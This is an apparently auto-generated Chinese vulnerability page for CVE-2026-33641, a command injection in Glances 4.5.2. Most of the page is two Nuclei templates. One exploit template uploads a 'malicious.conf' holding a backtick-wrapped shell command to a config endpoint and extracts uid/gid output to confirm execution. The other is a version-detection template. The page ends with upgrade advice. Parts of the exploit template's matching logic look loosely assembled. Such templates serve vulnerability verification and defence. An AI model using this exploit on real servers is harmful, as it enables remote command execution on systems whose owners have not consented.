[webapps] glances 4.5.2 - command injection
CVE-2026-33641
漏洞
High · CVSS N/A📋 漏洞基础信息
| CVE | CVE-2026-33641 |
|---|---|
| 漏洞类型 | 漏洞 |
| 受影响版本 | 详见原文 |
| 危害等级 | High · CVSS N/A |
| 发布日期 | 2026-05-13 |
| 提交者 | Stepanov Daniil |
| 来源 | Exploit-DB 原文 ↗ |
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2026-33641-exploit
info:
name: Glances 4.5.2 - Command Injection Exploit
author: steven
severity: high
description: Glances versions prior to 4.5.3 are vulnerable to command injection via dynamic configuration parsing. This exploit attempts to execute arbitrary commands through the vulnerable configuration upload or modification endpoint.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-33641
- https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7
tags: cve,cve2026,glances,command-injection,rce
variables:
cmd: "id"
http:
- raw:
- |
GET /api/2/version HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "{{cmd}}"
- raw:
- |
POST /api/2/config/upload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------99868198152613534213329528222
-----------------------------99868198152613534213329528222
Content-Disposition: form-data; name="file"; filename="malicious.conf"
Content-Type: text/plain
[outputs]
url_prefix = `{{cmd}}`
-----------------------------99868198152613534213329528222--
matchers:
- type: word
part: body
words:
- "{{cmd}}"
stop-at-first-match: false
extractors:
- type: regex
part: body
group: 1
regex:
- 'uid=\d+\([^)]+\)'
- 'gid=\d+\([^)]+\)'
- 'groups=\d+\([^)]+\)'🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2026-33641-detection
info:
name: Glances 4.5.2 - Command Injection Detection
author: steven
severity: high
description: Glances versions prior to 4.5.3 are vulnerable to command injection via dynamic configuration parsing. An attacker can execute arbitrary commands by modifying configuration files containing backtick-enclosed substrings.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2026-33641
- https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7
tags: cve,cve2026,glances,command-injection
http:
- method: GET
path:
- "{{BaseURL}}/api/2/version"
- "{{BaseURL}}/api/2/version/"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "4.5.0"
- "4.5.1"
- "4.5.2"
condition: or
- type: word
part: body
words:
- "version"
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- '(\d+\.\d+\.\d+)'🛡️ 修复建议
请升级到厂商最新安全版本。
📎 参考链接
🚨 威胁评估
| 📈 EPSS 利用概率 | 暂无数据 |
| 🚨 CISA KEV | 未被已知利用 |
| 🔧 公开 PoC | 暂无公开 PoC |
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-20 08:07 | 来源: Exploit-DB